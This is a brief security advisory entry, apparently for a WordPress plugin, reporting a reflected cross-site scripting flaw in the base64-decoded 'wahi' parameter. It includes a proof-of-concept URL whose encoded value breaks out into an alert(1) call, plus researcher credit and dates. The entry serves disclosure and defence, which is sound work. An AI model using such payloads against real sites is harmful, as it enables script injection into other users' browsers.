The plugin does not sanitise and escape the wahi parameter before outputting back its base64 decode value in the page, leading to a Reflected Cross-Site Scripting issue
https://example.com/?wahi=JzthbGVydCgxKTsvLw==
Krzysztof Zając
Krzysztof Zając
Yes
2022-01-26 (about 1 years ago)
2022-01-26 (about 1 years ago)
2022-04-09 (about 9 months ago)